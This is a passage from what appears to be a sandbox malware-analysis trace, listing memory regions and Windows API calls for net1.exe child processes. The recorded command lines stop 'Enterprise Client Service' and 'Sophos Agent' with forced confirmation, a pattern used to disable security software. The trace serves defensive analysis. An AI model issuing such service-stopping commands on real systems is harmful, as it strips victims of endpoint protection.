"apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3763 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3764 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 3765 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3766 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 3767 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3768 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3795 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3796 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3797 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3798 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 3799 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 3800 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3801 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3802 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 3803 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 3804 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 3805 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 3806 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3807 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3808 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3809 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 3810 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 3811 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3812 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3813 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3814 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3815 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3816 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3817 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3856 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 384 os_tid = 0xfe0 [0081.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fd90 | out: lpSystemTimeAsFileTime=0x28fd90*(dwLowDateTime=0xe5d4ff50, dwHighDateTime=0x1d48689)) [0081.636] GetCurrentProcessId () returned 0xfdc [0081.636] GetCurrentThreadId () returned 0xfe0 [0081.636] GetTickCount () returned 0x1e4d2 [0081.636] QueryPerformanceCounter (in: lpPerformanceCount=0x28fd98 | out: lpPerformanceCount=0x28fd98*=1812855400000) returned 1 [0081.637] GetModuleHandleW (lpModuleName=0x0) returned 0xffda0000 [0081.637] __set_app_type (_Type=0x1) [0081.637] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffdb9c9c) returned 0x0 [0081.637] __getmainargs (in: _Argc=0xffdc4780, _Argv=0xffdc4790, _Env=0xffdc4788, _DoWildCard=0, _StartInfo=0xffdc479c | out: _Argc=0xffdc4780, _Argv=0xffdc4790, _Env=0xffdc4788) returned 0 [0081.637] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0081.638] GetConsoleOutputCP () returned 0x1b5 [0081.645] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffdccec0 | out: lpCPInfo=0xffdccec0) returned 1 [0081.645] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0081.648] sprintf_s (in: _DstBuf=0x28fd38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0081.648] setlocale (category=0, locale=".437") returned="English_United States.437" [0081.651] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0081.651] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0081.651] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Enterprise Client Service\" /y" [0081.659] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28fad0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0081.659] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0081.659] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28fd28 | out: Buffer=0x28fd28*=0xec0f0) returned 0x0 [0081.659] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28fd28 | out: Buffer=0x28fd28*=0xec110) returned 0x0 [0081.659] _fileno (_File=0x7fefdba2a80) returned 0 [0081.659] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0081.659] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0081.659] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0081.659] _wcsicmp (_String1="config", _String2="stop") returned -16 [0081.659] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0081.659] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0081.659] _wcsicmp (_String1="file", _String2="stop") returned -13 [0081.659] _wcsicmp (_String1="files", _String2="stop") returned -13 [0081.659] _wcsicmp (_String1="group", _String2="stop") returned -12 [0081.659] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0081.659] _wcsicmp (_String1="help", _String2="stop") returned -11 [0081.660] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0081.660] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0081.660] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0081.660] _wcsicmp (_String1="session", _String2="stop") returned -15 [0081.660] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0081.660] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0081.660] _wcsicmp (_String1="share", _String2="stop") returned -12 [0081.660] _wcsicmp (_String1="start", _String2="stop") returned -14 [0081.660] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0081.660] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0081.660] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0081.660] _wcsicmp (_String1="accounts", _String2="Enterprise Client Service") returned -4 [0081.660] _wcsicmp (_String1="computer", _String2="Enterprise Client Service") returned -2 [0081.660] _wcsicmp (_String1="config", _String2="Enterprise Client Service") returned -2 [0081.660] _wcsicmp (_String1="continue", _String2="Enterprise Client Service") returned -2 [0081.660] _wcsicmp (_String1="cont", _String2="Enterprise Client Service") returned -2 [0081.660] _wcsicmp (_String1="file", _String2="Enterprise Client Service") returned 1 [0081.660] _wcsicmp (_String1="files", _String2="Enterprise Client Service") returned 1 [0081.660] _wcsicmp (_String1="group", _String2="Enterprise Client Service") returned 2 [0081.660] _wcsicmp (_String1="groups", _String2="Enterprise Client Service") returned 2 [0081.660] _wcsicmp (_String1="help", _String2="Enterprise Client Service") returned 3 [0081.660] _wcsicmp (_String1="helpmsg", _String2="Enterprise Client Service") returned 3 [0081.660] _wcsicmp (_String1="localgroup", _String2="Enterprise Client Service") returned 7 [0081.660] _wcsicmp (_String1="pause", _String2="Enterprise Client Service") returned 11 [0081.660] _wcsicmp (_String1="session", _String2="Enterprise Client Service") returned 14 [0081.660] _wcsicmp (_String1="sessions", _String2="Enterprise Client Service") returned 14 [0081.660] _wcsicmp (_String1="sess", _String2="Enterprise Client Service") returned 14 [0081.660] _wcsicmp (_String1="share", _String2="Enterprise Client Service") returned 14 [0081.660] _wcsicmp (_String1="start", _String2="Enterprise Client Service") returned 14 [0081.660] _wcsicmp (_String1="stats", _String2="Enterprise Client Service") returned 14 [0081.660] _wcsicmp (_String1="statistics", _String2="Enterprise Client Service") returned 14 [0081.660] _wcsicmp (_String1="stop", _String2="Enterprise Client Service") returned 14 [0081.660] _wcsicmp (_String1="time", _String2="Enterprise Client Service") returned 15 [0081.660] _wcsicmp (_String1="user", _String2="Enterprise Client Service") returned 16 [0081.660] _wcsicmp (_String1="users", _String2="Enterprise Client Service") returned 16 [0081.660] _wcsicmp (_String1="msg", _String2="Enterprise Client Service") returned 8 [0081.660] _wcsicmp (_String1="messenger", _String2="Enterprise Client Service") returned 8 [0081.660] _wcsicmp (_String1="receiver", _String2="Enterprise Client Service") returned 13 [0081.661] _wcsicmp (_String1="rcv", _String2="Enterprise Client Service") returned 13 [0081.661] _wcsicmp (_String1="netpopup", _String2="Enterprise Client Service") returned 9 [0081.661] _wcsicmp (_String1="redirector", _String2="Enterprise Client Service") returned 13 [0081.661] _wcsicmp (_String1="redir", _String2="Enterprise Client Service") returned 13 [0081.661] _wcsicmp (_String1="rdr", _String2="Enterprise Client Service") returned 13 [0081.661] _wcsicmp (_String1="workstation", _String2="Enterprise Client Service") returned 18 [0081.661] _wcsicmp (_String1="work", _String2="Enterprise Client Service") returned 18 [0081.661] _wcsicmp (_String1="wksta", _String2="Enterprise Client Service") returned 18 [0081.661] _wcsicmp (_String1="prdr", _String2="Enterprise Client Service") returned 11 [0081.661] _wcsicmp (_String1="devrdr", _String2="Enterprise Client Service") returned -1 [0081.661] _wcsicmp (_String1="lanmanworkstation", _String2="Enterprise Client Service") returned 7 [0081.661] _wcsicmp (_String1="server", _String2="Enterprise Client Service") returned 14 [0081.661] _wcsicmp (_String1="svr", _String2="Enterprise Client Service") returned 14 [0081.661] _wcsicmp (_String1="srv", _String2="Enterprise Client Service") returned 14 [0081.661] _wcsicmp (_String1="lanmanserver", _String2="Enterprise Client Service") returned 7 [0081.661] _wcsicmp (_String1="alerter", _String2="Enterprise Client Service") returned -4 [0081.661] _wcsicmp (_String1="netlogon", _String2="Enterprise Client Service") returned 9 [0081.661] _wcsupr (in: _String="Enterprise Client Service" | out: _String="ENTERPRISE CLIENT SERVICE") returned="ENTERPRISE CLIENT SERVICE" [0081.661] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xece20 [0081.666] GetServiceKeyNameW (in: hSCManager=0xece20, lpDisplayName="ENTERPRISE CLIENT SERVICE", lpServiceName=0xffdc5750, lpcchBuffer=0x28fc48 | out: lpServiceName="", lpcchBuffer=0x28fc48) returned 0 [0081.667] _wcsicmp (_String1="msg", _String2="ENTERPRISE CLIENT SERVICE") returned 8 [0081.667] _wcsicmp (_String1="messenger", _String2="ENTERPRISE CLIENT SERVICE") returned 8 [0081.667] _wcsicmp (_String1="receiver", _String2="ENTERPRISE CLIENT SERVICE") returned 13 [0081.667] _wcsicmp (_String1="rcv", _String2="ENTERPRISE CLIENT SERVICE") returned 13 [0081.667] _wcsicmp (_String1="redirector", _String2="ENTERPRISE CLIENT SERVICE") returned 13 [0081.668] _wcsicmp (_String1="redir", _String2="ENTERPRISE CLIENT SERVICE") returned 13 [0081.668] _wcsicmp (_String1="rdr", _String2="ENTERPRISE CLIENT SERVICE") returned 13 [0081.668] _wcsicmp (_String1="workstation", _String2="ENTERPRISE CLIENT SERVICE") returned 18 [0081.668] _wcsicmp (_String1="work", _String2="ENTERPRISE CLIENT SERVICE") returned 18 [0081.668] _wcsicmp (_String1="wksta", _String2="ENTERPRISE CLIENT SERVICE") returned 18 [0081.668] _wcsicmp (_String1="prdr", _String2="ENTERPRISE CLIENT SERVICE") returned 11 [0081.668] _wcsicmp (_String1="devrdr", _String2="ENTERPRISE CLIENT SERVICE") returned -1 [0081.668] _wcsicmp (_String1="lanmanworkstation", _String2="ENTERPRISE CLIENT SERVICE") returned 7 [0081.668] _wcsicmp (_String1="server", _String2="ENTERPRISE CLIENT SERVICE") returned 14 [0081.668] _wcsicmp (_String1="svr", _String2="ENTERPRISE CLIENT SERVICE") returned 14 [0081.668] _wcsicmp (_String1="srv", _String2="ENTERPRISE CLIENT SERVICE") returned 14 [0081.668] _wcsicmp (_String1="lanmanserver", _String2="ENTERPRISE CLIENT SERVICE") returned 7 [0081.668] _wcsicmp (_String1="alerter", _String2="ENTERPRISE CLIENT SERVICE") returned -4 [0081.668] _wcsicmp (_String1="netlogon", _String2="ENTERPRISE CLIENT SERVICE") returned 9 [0081.669] NetServiceControl (in: servername=0x0, service="ENTERPRISE CLIENT SERVICE", opcode=0x0, arg=0x0, bufptr=0x28fc50 | out: bufptr=0x28fc50) returned 0x889 [0081.758] wcscpy_s (in: _Destination=0xffdc80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0081.758] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0081.760] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffdc5b50, nSize=0x800, Arguments=0xffdc7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0081.762] GetFileType (hFile=0xb) returned 0x2 [0081.762] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fb18 | out: lpMode=0x28fb18) returned 1 [0081.762] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdc5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x28fb10, lpReserved=0x0 | out: lpBuffer=0xffdc5b50*, lpNumberOfCharsWritten=0x28fb10*=0x1e) returned 1 [0081.762] GetFileType (hFile=0xb) returned 0x2 [0081.763] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fb18 | out: lpMode=0x28fb18) returned 1 [0081.763] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffda1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28fb10, lpReserved=0x0 | out: lpBuffer=0xffda1efc*, lpNumberOfCharsWritten=0x28fb10*=0x2) returned 1 [0081.763] _ultow (in: _Dest=0x889, _Radix=2685824 | out: _Dest=0x889) returned="2185" [0081.763] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffdc5b50, nSize=0x800, Arguments=0xffdc7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0081.763] GetFileType (hFile=0xb) returned 0x2 [0081.764] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fb18 | out: lpMode=0x28fb18) returned 1 [0081.764] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdc5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x28fb10, lpReserved=0x0 | out: lpBuffer=0xffdc5b50*, lpNumberOfCharsWritten=0x28fb10*=0x34) returned 1 [0081.764] GetFileType (hFile=0xb) returned 0x2 [0081.765] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fb18 | out: lpMode=0x28fb18) returned 1 [0081.765] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffda1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28fb10, lpReserved=0x0 | out: lpBuffer=0xffda1efc*, lpNumberOfCharsWritten=0x28fb10*=0x2) returned 1 [0081.765] NetApiBufferFree (Buffer=0xec0f0) returned 0x0 [0081.765] NetApiBufferFree (Buffer=0xec110) returned 0x0 [0081.765] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Enterprise Client Service\" /y" [0081.765] exit (_Code=2) Process: id = "55" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x2475b000" os_pid = "0xff4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "50" os_parent_pid = "0xf5c" cmd_line = "C:\\Windows\\system32\\net1 stop \"Sophos Agent\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3818 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3819 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3820 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3821 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 3822 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3823 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3824 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3825 start_va = 0xffda0000 end_va = 0xffdd2fff entry_point = 0xffda0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 3826 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3827 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3828 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 3829 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 3830 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3831 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3832 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3833 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3834 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3835 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3836 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3837 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3838 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3839 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3840 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 3841 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 3842 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 3843 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 3844 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3845 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3846 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3847 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 3848 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 3849 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3850 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3851 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3852 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3853 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3854 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3855 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3872 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 385 os_tid = 0xff8 [0081.753] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xef910 | out: lpSystemTimeAsFileTime=0xef910*(dwLowDateTime=0xe5e5a8f0, dwHighDateTime=0x1d48689)) [0081.753] GetCurrentProcessId () returned 0xff4 [0081.754] GetCurrentThreadId () returned 0xff8 [0081.754] GetTickCount () returned 0x1e53f [0081.754] QueryPerformanceCounter (in: lpPerformanceCount=0xef918 | out: lpPerformanceCount=0xef918*=1812867200000) returned 1 [0081.755] GetModuleHandleW (lpModuleName=0x0) returned 0xffda0000 [0081.755] __set_app_type (_Type=0x1) [0081.755] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffdb9c9c) returned 0x0 [0081.755] __getmainargs (in: _Argc=0xffdc4780, _Argv=0xffdc4790, _Env=0xffdc4788, _DoWildCard=0, _StartInfo=0xffdc479c | out: _Argc=0xffdc4780, _Argv=0xffdc4790, _Env=0xffdc4788) returned 0 [0081.756] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0081.756] GetConsoleOutputCP () returned 0x1b5 [0081.756] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffdccec0 | out: lpCPInfo=0xffdccec0) returned 1 [0081.756] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0081.847] sprintf_s (in: _DstBuf=0xef8b8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0081.848] setlocale (category=0, locale=".437") returned="English_United States.437" [0081.849] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0081.849] GetStdHandle 